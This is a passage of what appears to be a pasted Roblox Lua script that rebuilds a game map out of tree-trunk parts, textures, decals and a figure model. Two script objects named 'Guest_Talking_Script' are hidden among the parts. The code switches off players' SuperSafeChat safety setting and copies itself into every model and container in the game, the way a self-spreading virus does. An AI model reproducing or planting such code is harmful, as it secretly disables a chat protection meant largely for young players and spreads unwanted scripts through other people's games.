  2197. o268 = Create("Texture",{
  2198. ["Name"] = "top",
  2199. ["Parent"] = o267,
  2200. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2201. ["Face"] = Enum.NormalId.Top,
  2202. ["StudsPerTileU"] = 4,
  2203. ["StudsPerTileV"] = 4,
  2204. })
  2205. o269 = Create("Texture",{
  2206. ["Name"] = "back",
  2207. ["Parent"] = o267,
  2208. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2209. ["Face"] = Enum.NormalId.Back,
  2210. ["StudsPerTileU"] = 4,
  2211. ["StudsPerTileV"] = 4,
  2212. })
  2213. o270 = Create("Texture",{
  2214. ["Name"] = "left",
  2215. ["Parent"] = o267,
  2216. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2217. ["Face"] = Enum.NormalId.Left,
  2218. ["StudsPerTileU"] = 4,
  2219. ["StudsPerTileV"] = 4,
  2220. })
  2221. o271 = Create("Texture",{
  2222. ["Name"] = "right",
  2223. ["Parent"] = o267,
  2224. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2225. ["Face"] = Enum.NormalId.Right,
  2226. ["StudsPerTileU"] = 4,
  2227. ["StudsPerTileV"] = 4,
  2228. })
  2229. o272 = Create("Texture",{
  2230. ["Name"] = "bottom",
  2231. ["Parent"] = o267,
  2232. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2233. ["Face"] = Enum.NormalId.Bottom,
  2234. ["StudsPerTileU"] = 4,
  2235. ["StudsPerTileV"] = 4,
  2236. })
  2237. o273 = Create("Decal",{
  2238. ["Parent"] = o267,
  2239. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  2240. })
  2241. o274 = Create("Part",{
  2242. ["Name"] = "trunk",
  2243. ["Parent"] = o5,
  2244. ["BrickColor"] = BrickColor.new("Dark orange"),
  2245. ["Position"] = Vector3.new(-17.900116, 173.390137, 111.799652),
  2246. ["Rotation"] = Vector3.new(-0, 90, 0),
  2247. ["Anchored"] = true,
  2248. ["CFrame"] = CFrame.new(-17.900116, 173.390137, 111.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  2249. ["Size"] = Vector3.new(1, 3.60000014, 2),
  2250. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  2251. })
  2252. o275 = Create("Texture",{
  2253. ["Name"] = "top",
  2254. ["Parent"] = o274,
  2255. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2256. ["Face"] = Enum.NormalId.Top,
  2257. ["StudsPerTileU"] = 4,
  2258. ["StudsPerTileV"] = 4,
  2259. })
  2260. o276 = Create("Texture",{
  2261. ["Name"] = "back",
  2262. ["Parent"] = o274,
  2263. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2264. ["Face"] = Enum.NormalId.Back,
  2265. ["StudsPerTileU"] = 4,
  2266. ["StudsPerTileV"] = 4,
  2267. })
  2268. o277 = Create("Texture",{
  2269. ["Name"] = "left",
  2270. ["Parent"] = o274,
  2271. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2272. ["Face"] = Enum.NormalId.Left,
  2273. ["StudsPerTileU"] = 4,
  2274. ["StudsPerTileV"] = 4,
  2275. })
  2276. o278 = Create("Texture",{
  2277. ["Name"] = "right",
  2278. ["Parent"] = o274,
  2279. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2280. ["Face"] = Enum.NormalId.Right,
  2281. ["StudsPerTileU"] = 4,
  2282. ["StudsPerTileV"] = 4,
  2283. })
  2284. o279 = Create("Texture",{
  2285. ["Name"] = "bottom",
  2286. ["Parent"] = o274,
  2287. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2288. ["Face"] = Enum.NormalId.Bottom,
  2289. ["StudsPerTileU"] = 4,
  2290. ["StudsPerTileV"] = 4,
  2291. })
  2292. o280 = Create("Decal",{
  2293. ["Parent"] = o274,
  2294. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  2295. })
  2296. o281 = Create("Part",{
  2297. ["Name"] = "trunk",
  2298. ["Parent"] = o5,
  2299. ["BrickColor"] = BrickColor.new("Dark orange"),
  2300. ["Position"] = Vector3.new(-17.900116, 156.790146, 147.299652),
  2301. ["Anchored"] = true,
  2302. ["CFrame"] = CFrame.new(-17.900116, 156.790146, 147.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  2303. ["Size"] = Vector3.new(2, 2.4000001, 2),
  2304. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  2305. })
  2306. o282 = Create("Texture",{
  2307. ["Name"] = "top",
  2308. ["Parent"] = o281,
  2309. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2310. ["Face"] = Enum.NormalId.Top,
  2311. ["StudsPerTileU"] = 4,
  2312. ["StudsPerTileV"] = 4,
  2313. })
  2314. o283 = Create("Texture",{
  2315. ["Name"] = "back",
  2316. ["Parent"] = o281,
  2317. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2318. ["Face"] = Enum.NormalId.Back,
  2319. ["StudsPerTileU"] = 4,
  2320. ["StudsPerTileV"] = 4,
  2321. })
  2322. o284 = Create("Texture",{
  2323. ["Name"] = "left",
  2324. ["Parent"] = o281,
  2325. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2326. ["Face"] = Enum.NormalId.Left,
  2327. ["StudsPerTileU"] = 4,
  2328. ["StudsPerTileV"] = 4,
  2329. })
  2330. o285 = Create("Texture",{
  2331. ["Name"] = "right",
  2332. ["Parent"] = o281,
  2333. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2334. ["Face"] = Enum.NormalId.Right,
  2335. ["StudsPerTileU"] = 4,
  2336. ["StudsPerTileV"] = 4,
  2337. })
  2338. o286 = Create("Texture",{
  2339. ["Name"] = "bottom",
  2340. ["Parent"] = o281,
  2341. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2342. ["Face"] = Enum.NormalId.Bottom,
  2343. ["StudsPerTileU"] = 4,
  2344. ["StudsPerTileV"] = 4,
  2345. })
  2346. o287 = Create("Texture",{
  2347. ["Name"] = "right",
  2348. ["Parent"] = o281,
  2349. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2350. ["StudsPerTileU"] = 4,
  2351. ["StudsPerTileV"] = 4,
  2352. })
  2353. o288 = Create("Part",{
  2354. ["Name"] = "trunk",
  2355. ["Parent"] = o5,
  2356. ["Material"] = Enum.Material.CorrodedMetal,
  2357. ["BrickColor"] = BrickColor.new("Dark orange"),
  2358. ["Position"] = Vector3.new(-36.4001999, 164.990082, 107.299652),
  2359. ["Rotation"] = Vector3.new(180, -0, -180),
  2360. ["Anchored"] = true,
  2361. ["CFrame"] = CFrame.new(-36.4001999, 164.990082, 107.299652, -1, 0, -0, -0, 1, -0, -0, 0, -1),
  2362. ["Size"] = Vector3.new(39, 13.2000008, 2),
  2363. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  2364. })
  2365. o289 = Create("Texture",{
  2366. ["Name"] = "top",
  2367. ["Parent"] = o288,
  2368. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2369. ["Face"] = Enum.NormalId.Top,
  2370. ["StudsPerTileU"] = 4,
  2371. ["StudsPerTileV"] = 4,
  2372. })
  2373. o290 = Create("Texture",{
  2374. ["Name"] = "back",
  2375. ["Parent"] = o288,
  2376. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2377. ["Face"] = Enum.NormalId.Back,
  2378. ["StudsPerTileU"] = 4,
  2379. ["StudsPerTileV"] = 4,
  2380. })
  2381. o291 = Create("Texture",{
  2382. ["Name"] = "left",
  2383. ["Parent"] = o288,
  2384. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2385. ["Face"] = Enum.NormalId.Left,
  2386. ["StudsPerTileU"] = 4,
  2387. ["StudsPerTileV"] = 4,
  2388. })
  2389. o292 = Create("Texture",{
  2390. ["Name"] = "right",
  2391. ["Parent"] = o288,
  2392. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2393. ["Face"] = Enum.NormalId.Right,
  2394. ["StudsPerTileU"] = 4,
  2395. ["StudsPerTileV"] = 4,
  2396. })
  2397. o293 = Create("Texture",{
  2398. ["Name"] = "bottom",
  2399. ["Parent"] = o288,
  2400. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2401. ["Face"] = Enum.NormalId.Bottom,
  2402. ["StudsPerTileU"] = 4,
  2403. ["StudsPerTileV"] = 4,
  2404. })
  2405. o294 = Create("Decal",{
  2406. ["Parent"] = o288,
  2407. ["Texture"] = "http://www.roblox.com/asset/?id=40297422",
  2408. })
  2409. o295 = Create("Decal",{
  2410. ["Parent"] = o288,
  2411. ["Texture"] = "http://www.roblox.com/asset/?id=48814895",
  2412. })
  2413. o296 = Create("Fire",{
  2414. ["Parent"] = o288,
  2415. ["Size"] = 30,
  2416. ["Color"] = Color3.new(1, 0.788235, 0),
  2417. ["Enabled"] = false,
  2418. ["Heat"] = 25,
  2419. ["SecondaryColor"] = Color3.new(1, 0, 0),
  2420. })
  2421. o297 = Create("Part",{
  2422. ["Name"] = "trunk",
  2423. ["Parent"] = o5,
  2424. ["BrickColor"] = BrickColor.new("Dark orange"),
  2425. ["Position"] = Vector3.new(-16.4001846, 157.390045, 127.299652),
  2426. ["Anchored"] = true,
  2427. ["CFrame"] = CFrame.new(-16.4001846, 157.390045, 127.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  2428. ["Size"] = Vector3.new(1, 3.60000014, 8),
  2429. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  2430. })
  2431. o298 = Create("Texture",{
  2432. ["Name"] = "top",
  2433. ["Parent"] = o297,
  2434. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2435. ["Face"] = Enum.NormalId.Top,
  2436. ["StudsPerTileU"] = 4,
  2437. ["StudsPerTileV"] = 4,
  2438. })
  2439. o299 = Create("Texture",{
  2440. ["Name"] = "back",
  2441. ["Parent"] = o297,
  2442. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2443. ["Face"] = Enum.NormalId.Back,
  2444. ["StudsPerTileU"] = 4,
  2445. ["StudsPerTileV"] = 4,
  2446. })
  2447. o300 = Create("Texture",{
  2448. ["Name"] = "left",
  2449. ["Parent"] = o297,
  2450. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2451. ["Face"] = Enum.NormalId.Left,
  2452. ["StudsPerTileU"] = 4,
  2453. ["StudsPerTileV"] = 4,
  2454. })
  2455. o301 = Create("Texture",{
  2456. ["Name"] = "right",
  2457. ["Parent"] = o297,
  2458. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2459. ["Face"] = Enum.NormalId.Right,
  2460. ["StudsPerTileU"] = 4,
  2461. ["StudsPerTileV"] = 4,
  2462. })
  2463. o302 = Create("Texture",{
  2464. ["Name"] = "bottom",
  2465. ["Parent"] = o297,
  2466. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2467. ["Face"] = Enum.NormalId.Bottom,
  2468. ["StudsPerTileU"] = 4,
  2469. ["StudsPerTileV"] = 4,
  2470. })
  2471. o303 = Create("Texture",{
  2472. ["Name"] = "right",
  2473. ["Parent"] = o297,
  2474. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2475. ["StudsPerTileU"] = 4,
  2476. ["StudsPerTileV"] = 4,
  2477. })
  2478. o304 = Create("Fire",{
  2479. ["Parent"] = o297,
  2480. ["Size"] = 30,
  2481. ["Color"] = Color3.new(1, 0.788235, 0),
  2482. ["Enabled"] = false,
  2483. ["Heat"] = 25,
  2484. ["SecondaryColor"] = Color3.new(1, 0, 0),
  2485. })
  2486. o305 = Create("Part",{
  2487. ["Name"] = "trunk",
  2488. ["Parent"] = o5,
  2489. ["BrickColor"] = BrickColor.new("Dark orange"),
  2490. ["Position"] = Vector3.new(-15.4001846, 156.790146, 127.299652),
  2491. ["Anchored"] = true,
  2492. ["CFrame"] = CFrame.new(-15.4001846, 156.790146, 127.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  2493. ["Size"] = Vector3.new(1, 2.4000001, 8),
  2494. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  2495. })
  2496. o306 = Create("Texture",{
  2497. ["Name"] = "top",
  2498. ["Parent"] = o305,
  2499. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2500. ["Face"] = Enum.NormalId.Top,
  2501. ["StudsPerTileU"] = 4,
  2502. ["StudsPerTileV"] = 4,
  2503. })
  2504. o307 = Create("Texture",{
  2505. ["Name"] = "back",
  2506. ["Parent"] = o305,
  2507. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2508. ["Face"] = Enum.NormalId.Back,
  2509. ["StudsPerTileU"] = 4,
  2510. ["StudsPerTileV"] = 4,
  2511. })
  2512. o308 = Create("Texture",{
  2513. ["Name"] = "left",
  2514. ["Parent"] = o305,
  2515. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2516. ["Face"] = Enum.NormalId.Left,
  2517. ["StudsPerTileU"] = 4,
  2518. ["StudsPerTileV"] = 4,
  2519. })
  2520. o309 = Create("Texture",{
  2521. ["Name"] = "right",
  2522. ["Parent"] = o305,
  2523. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2524. ["Face"] = Enum.NormalId.Right,
  2525. ["StudsPerTileU"] = 4,
  2526. ["StudsPerTileV"] = 4,
  2527. })
  2528. o310 = Create("Texture",{
  2529. ["Name"] = "bottom",
  2530. ["Parent"] = o305,
  2531. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2532. ["Face"] = Enum.NormalId.Bottom,
  2533. ["StudsPerTileU"] = 4,
  2534. ["StudsPerTileV"] = 4,
  2535. })
  2536. o311 = Create("Texture",{
  2537. ["Name"] = "right",
  2538. ["Parent"] = o305,
  2539. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2540. ["StudsPerTileU"] = 4,
  2541. ["StudsPerTileV"] = 4,
  2542. })
  2543. o312 = Create("Fire",{
  2544. ["Parent"] = o305,
  2545. ["Size"] = 30,
  2546. ["Color"] = Color3.new(1, 0.788235, 0),
  2547. ["Enabled"] = false,
  2548. ["Heat"] = 25,
  2549. ["SecondaryColor"] = Color3.new(1, 0, 0),
  2550. })
  2551. o313 = Create("Part",{
  2552. ["Name"] = "trunk",
  2553. ["Parent"] = o5,
  2554. ["BrickColor"] = BrickColor.new("Dark orange"),
  2555. ["Position"] = Vector3.new(-17.900116, 156.790146, 107.299652),
  2556. ["Anchored"] = true,
  2557. ["CFrame"] = CFrame.new(-17.900116, 156.790146, 107.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  2558. ["Size"] = Vector3.new(2, 2.4000001, 2),
  2559. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  2560. })
  2561. o314 = Create("Texture",{
  2562. ["Name"] = "top",
  2563. ["Parent"] = o313,
  2564. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2565. ["Face"] = Enum.NormalId.Top,
  2566. ["StudsPerTileU"] = 4,
  2567. ["StudsPerTileV"] = 4,
  2568. })
  2569. o315 = Create("Texture",{
  2570. ["Name"] = "back",
  2571. ["Parent"] = o313,
  2572. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2573. ["Face"] = Enum.NormalId.Back,
  2574. ["StudsPerTileU"] = 4,
  2575. ["StudsPerTileV"] = 4,
  2576. })
  2577. o316 = Create("Texture",{
  2578. ["Name"] = "left",
  2579. ["Parent"] = o313,
  2580. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2581. ["Face"] = Enum.NormalId.Left,
  2582. ["StudsPerTileU"] = 4,
  2583. ["StudsPerTileV"] = 4,
  2584. })
  2585. o317 = Create("Texture",{
  2586. ["Name"] = "right",
  2587. ["Parent"] = o313,
  2588. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2589. ["Face"] = Enum.NormalId.Right,
  2590. ["StudsPerTileU"] = 4,
  2591. ["StudsPerTileV"] = 4,
  2592. })
  2593. o318 = Create("Texture",{
  2594. ["Name"] = "bottom",
  2595. ["Parent"] = o313,
  2596. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2597. ["Face"] = Enum.NormalId.Bottom,
  2598. ["StudsPerTileU"] = 4,
  2599. ["StudsPerTileV"] = 4,
  2600. })
  2601. o319 = Create("Texture",{
  2602. ["Name"] = "right",
  2603. ["Parent"] = o313,
  2604. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2605. ["StudsPerTileU"] = 4,
  2606. ["StudsPerTileV"] = 4,
  2607. })
  2608. o320 = Create("Part",{
  2609. ["Name"] = "trunk",
  2610. ["Parent"] = o5,
  2611. ["BrickColor"] = BrickColor.new("Dark orange"),
  2612. ["Position"] = Vector3.new(-14.4001846, 156.190109, 127.299652),
  2613. ["Anchored"] = true,
  2614. ["CFrame"] = CFrame.new(-14.4001846, 156.190109, 127.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  2615. ["Size"] = Vector3.new(1, 1.20000005, 8),
  2616. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  2617. })
  2618. o321 = Create("Texture",{
  2619. ["Name"] = "top",
  2620. ["Parent"] = o320,
  2621. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2622. ["Face"] = Enum.NormalId.Top,
  2623. ["StudsPerTileU"] = 4,
  2624. ["StudsPerTileV"] = 4,
  2625. })
  2626. o322 = Create("Texture",{
  2627. ["Name"] = "back",
  2628. ["Parent"] = o320,
  2629. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2630. ["Face"] = Enum.NormalId.Back,
  2631. ["StudsPerTileU"] = 4,
  2632. ["StudsPerTileV"] = 4,
  2633. })
  2634. o323 = Create("Texture",{
  2635. ["Name"] = "left",
  2636. ["Parent"] = o320,
  2637. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2638. ["Face"] = Enum.NormalId.Left,
  2639. ["StudsPerTileU"] = 4,
  2640. ["StudsPerTileV"] = 4,
  2641. })
  2642. o324 = Create("Texture",{
  2643. ["Name"] = "right",
  2644. ["Parent"] = o320,
  2645. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2646. ["Face"] = Enum.NormalId.Right,
  2647. ["StudsPerTileU"] = 4,
  2648. ["StudsPerTileV"] = 4,
  2649. })
  2650. o325 = Create("Texture",{
  2651. ["Name"] = "bottom",
  2652. ["Parent"] = o320,
  2653. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2654. ["Face"] = Enum.NormalId.Bottom,
  2655. ["StudsPerTileU"] = 4,
  2656. ["StudsPerTileV"] = 4,
  2657. })
  2658. o326 = Create("Texture",{
  2659. ["Name"] = "right",
  2660. ["Parent"] = o320,
  2661. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2662. ["StudsPerTileU"] = 4,
  2663. ["StudsPerTileV"] = 4,
  2664. })
  2665. o327 = Create("Fire",{
  2666. ["Parent"] = o320,
  2667. ["Size"] = 30,
  2668. ["Color"] = Color3.new(1, 0.788235, 0),
  2669. ["Enabled"] = false,
  2670. ["Heat"] = 25,
  2671. ["SecondaryColor"] = Color3.new(1, 0, 0),
  2672. })
  2673. o328 = Create("Script",{
  2674. ["Name"] = "Guest_Talking_Script",
  2675. ["Parent"] = o5,
  2676. })
  2677. table.insert(cors,coroutine.create(function()
  2678. wait()
  2679. runDummyScript(function()
  2680. if (script.Parent == workspace) then
  2681. function checkForAndSwitch(player)
  2682. if (player.SuperSafeChat == true) then
  2683. player.SuperSafeChat = false;
  2684. wait(5);
  2685. local m = Instance.new("Message");
  2686. m.Text = "Press the / key to start typing.";
  2687. m.Parent = player;
  2688. wait(5);
  2689. m.Text = "Then press Enter to send your message.";
  2690. wait(5);
  2691. m:Remove();
  2692. m = nil;
  2693. end
  2694. player = nil;
  2695. collectgarbage("collect");
  2696. end
  2697.  
  2698. function onChildAddedToPlayers(obj)
  2699. if (obj.className == "Player") then
  2700. checkForAndSwitch(obj);
  2701. local m = Instance.new("Message");
  2702. m.Text = "welcome me place!!!";
  2703. m.Parent = obj;
  2704. wait(5);
  2705. m:Remove();
  2706. m = nil;
  2707. end
  2708. obj = nil;
  2709. collectgarbage("collect");
  2710. end
  2711.  
  2712. function onChildAddedToWorkspace(obj)
  2713. if (obj.className == "Model") then
  2714. if (game.Players:playerFromCharacter(obj) ~= nil) then
  2715. checkForAndSwitch(game.Players:playerFromCharacter(obj));
  2716. end
  2717. end
  2718. obj = nil;
  2719. collectgarbage("collect");
  2720. end
  2721.  
  2722. function findLowestLevel(obj)
  2723. local c = obj:GetChildren();
  2724. local lowestLevel = true;
  2725.  
  2726. for i, v in pairs(c) do
  2727. if (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  2728. lowestLevel = false;
  2729. wait();
  2730. findLowestLevel(v);
  2731. end
  2732. end
  2733.  
  2734. if (obj ~= workspace and lowestLevel == true and (obj:FindFirstChild(script.Name) == nil)) then
  2735. if (obj ~= game.Lighting and obj ~= game.StarterPack) then
  2736. local s = script:Clone();
  2737. s.Parent = obj;
  2738. end
  2739. end
  2740. end
  2741.  
  2742. findLowestLevel(game);
  2743.  
  2744. game.Players.ChildAdded:connect(onChildAddedToPlayers);
  2745. game.Workspace.ChildAdded:connect(onChildAddedToWorkspace);
  2746. else
  2747. local findScript = workspace:FindFirstChild(script.Name);
  2748.  
  2749. if (findScript == nil) then
  2750. local s = script:Clone();
  2751. s.Parent = workspace;
  2752. end
  2753. end
  2754.  
  2755. --[[function findAllCopies(obj)
  2756. local c = obj:GetChildren();
  2757.  
  2758. for i, v in pairs(c) do
  2759. if (v.Name == script.Name and v.className == "Script" and v ~= script) then
  2760. v.Parent = nil;
  2761. elseif (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  2762. findAllCopies(v);
  2763. end
  2764. end
  2765. end
  2766.  
  2767. findAllCopies(game);
  2768.  
  2769. script.Parent = nil;]]
  2770. end,o328)
  2771. end))
  2772. o330 = Create("Weld",{
  2773. ["Name"] = "J0HN",
  2774. ["Parent"] = o328,
  2775. })
  2776. o331 = Create("Part",{
  2777. ["Name"] = "part",
  2778. ["Parent"] = o1,
  2779. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  2780. ["Position"] = Vector3.new(-33.9001389, 161.718704, 136.299652),
  2781. ["Rotation"] = Vector3.new(-11.9834099, 0, -0),
  2782. ["Anchored"] = true,
  2783. ["CFrame"] = CFrame.new(-33.9001389, 161.718704, 136.299652, 1, 0, 0, 0, 0.978207767, 0.207628459, 0, -0.207628459, 0.978207767),
  2784. ["CanCollide"] = false,
  2785. ["Size"] = Vector3.new(2, 1.20000005, 2),
  2786. ["TopSurface"] = Enum.SurfaceType.Smooth,
  2787. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  2788. })
  2789. o332 = Create("SpecialMesh",{
  2790. ["Parent"] = o331,
  2791. ["MeshId"] = "http://www.roblox.com/asset/?id=3270017",
  2792. ["MeshType"] = Enum.MeshType.FileMesh,
  2793. })
  2794. o333 = Create("Model",{
  2795. ["Parent"] = o1,
  2796. })
  2797. o334 = Create("Model",{
  2798. ["Name"] = "Come in......",
  2799. ["Parent"] = o333,
  2800. })
  2801. o335 = Create("Part",{
  2802. ["Name"] = "Head",
  2803. ["Parent"] = o334,
  2804. ["Material"] = Enum.Material.Slate,
  2805. ["BrickColor"] = BrickColor.new("Institutional white"),
  2806. ["Position"] = Vector3.new(-33.4001999, 162.790146, 122.299652),
  2807. ["Rotation"] = Vector3.new(-0, 90, 0),
  2808. ["Anchored"] = true,
  2809. ["CFrame"] = CFrame.new(-33.4001999, 162.790146, 122.299652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  2810. ["FormFactor"] = Enum.FormFactor.Plate,
  2811. ["Size"] = Vector3.new(2, 0.800000012, 1),
  2812. ["Color"] = Color3.new(0.972549, 0.972549, 0.972549),
  2813. })
  2814. o336 = Create("SpecialMesh",{
  2815. ["Parent"] = o335,
  2816. ["Scale"] = Vector3.new(1.35000002, 1.45000005, 1.25),
  2817. })
  2818. o337 = Create("Decal",{
  2819. ["Parent"] = o335,
  2820. ["Texture"] = "http://www.roblox.com/asset/?id=25092870",
  2821. ["Face"] = Enum.NormalId.Back,
  2822. })
  2823. o338 = Create("Decal",{
  2824. ["Parent"] = o335,
  2825. ["Texture"] = "http://www.roblox.com/asset/?id=26601226",
  2826. ["Face"] = Enum.NormalId.Back,
  2827. })
  2828. o339 = Create("Decal",{
  2829. ["Parent"] = o335,
  2830. ["Texture"] = "http://www.roblox.com/asset/?id=13603673",
  2831. ["Face"] = Enum.NormalId.Back,
  2832. })
  2833. o340 = Create("Fire",{
  2834. ["Parent"] = o335,
  2835. ["Size"] = 30,
  2836. ["Color"] = Color3.new(1, 0.788235, 0),
  2837. ["Enabled"] = false,
  2838. ["Heat"] = 25,
  2839. ["SecondaryColor"] = Color3.new(1, 0, 0),
  2840. })
  2841. o341 = Create("Humanoid",{
  2842. ["Parent"] = o334,
  2843. ["Health"] = 0,
  2844. ["MaxHealth"] = 0,
  2845. })
  2846. o342 = Create("Script",{
  2847. ["Name"] = "Guest_Talking_Script",
  2848. ["Parent"] = o334,
  2849. })
  2850. table.insert(cors,coroutine.create(function()
  2851. wait()
  2852. runDummyScript(function()
  2853. if (script.Parent == workspace) then
  2854. function checkForAndSwitch(player)
  2855. if (player.SuperSafeChat == true) then
  2856. player.SuperSafeChat = false;
  2857. wait(5);
  2858. local m = Instance.new("Message");
  2859. m.Text = "Press the / key to start typing.";
  2860. m.Parent = player;
  2861. wait(5);
  2862. m.Text = "Then press Enter to send your message.";
  2863. wait(5);
  2864. m:Remove();
  2865. m = nil;
  2866. end
  2867. player = nil;
  2868. collectgarbage("collect");
  2869. end
  2870.  
  2871. function onChildAddedToPlayers(obj)
  2872. if (obj.className == "Player") then
  2873. checkForAndSwitch(obj);
  2874. local m = Instance.new("Message");
  2875. m.Text = "welcome me place!!!";
  2876. m.Parent = obj;
  2877. wait(5);
  2878. m:Remove();
  2879. m = nil;
  2880. end
  2881. obj = nil;
  2882. collectgarbage("collect");
  2883. end
  2884.  
  2885. function onChildAddedToWorkspace(obj)
  2886. if (obj.className == "Model") then
  2887. if (game.Players:playerFromCharacter(obj) ~= nil) then
  2888. checkForAndSwitch(game.Players:playerFromCharacter(obj));
  2889. end
  2890. end
  2891. obj = nil;
  2892. collectgarbage("collect");
  2893. end
  2894.  
  2895. function findLowestLevel(obj)
  2896. local c = obj:GetChildren();
  2897. local lowestLevel = true;
  2898.  
  2899. for i, v in pairs(c) do
  2900. if (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  2901. lowestLevel = false;
  2902. wait();
  2903. findLowestLevel(v);
  2904. end
  2905. end
  2906.  
  2907. if (obj ~= workspace and lowestLevel == true and (obj:FindFirstChild(script.Name) == nil)) then
  2908. if (obj ~= game.Lighting and obj ~= game.StarterPack) then
  2909. local s = script:Clone();
  2910. s.Parent = obj;
  2911. end
  2912. end
  2913. end
  2914.  
  2915. findLowestLevel(game);
  2916.  
  2917. game.Players.ChildAdded:connect(onChildAddedToPlayers);
  2918. game.Workspace.ChildAdded:connect(onChildAddedToWorkspace);
  2919. else
  2920. local findScript = workspace:FindFirstChild(script.Name);
  2921.  
  2922. if (findScript == nil) then
  2923. local s = script:Clone();
  2924. s.Parent = workspace;
  2925. end
  2926. end
  2927.  
  2928. --[[function findAllCopies(obj)
  2929. local c = obj:GetChildren();
  2930.  
  2931. for i, v in pairs(c) do
  2932. if (v.Name == script.Name and v.className == "Script" and v ~= script) then
  2933. v.Parent = nil;
  2934. elseif (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  2935. findAllCopies(v);
  2936. end
  2937. end
  2938. end
  2939.  
  2940. findAllCopies(game);
  2941.  
  2942. script.Parent = nil;]]
  2943. end,o342)
  2944. end))
  2945. o344 = Create("Weld",{
  2946. ["Name"] = "J0HN",
  2947. ["Parent"] = o342,
  2948. })
  2949. o345 = Create("Part",{
  2950. ["Parent"] = o333,
  2951. ["Material"] = Enum.Material.Slate,
  2952. ["BrickColor"] = BrickColor.new("Really black"),
  2953. ["Reflectance"] = 0.30000001192093,
  2954. ["Position"] = Vector3.new(-33.4001999, 161.390045, 122.299652),
  2955. ["Anchored"] = true,
  2956. ["CFrame"] = CFrame.new(-33.4001999, 161.390045, 122.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  2957. ["FormFactor"] = Enum.FormFactor.Symmetric,
  2958. ["Size"] = Vector3.new(1, 2, 4),
  2959. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  2960. ["TopSurface"] = Enum.SurfaceType.Smooth,
  2961. ["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
  2962. })
  2963. o346 = Create("Fire",{
  2964. ["Parent"] = o345,
  2965. ["Size"] = 30,
  2966. ["Color"] = Color3.new(1, 0.788235, 0),
  2967. ["Enabled"] = false,
  2968. ["Heat"] = 25,
  2969. ["SecondaryColor"] = Color3.new(1, 0, 0),
  2970. })
  2971. o347 = Create("Part",{
  2972. ["Parent"] = o333,
  2973. ["Material"] = Enum.Material.Slate,
  2974. ["BrickColor"] = BrickColor.new("Really black"),
  2975. ["Reflectance"] = 0.30000001192093,
  2976. ["Position"] = Vector3.new(-33.4001999, 159.390045, 122.299652),
  2977. ["Anchored"] = true,
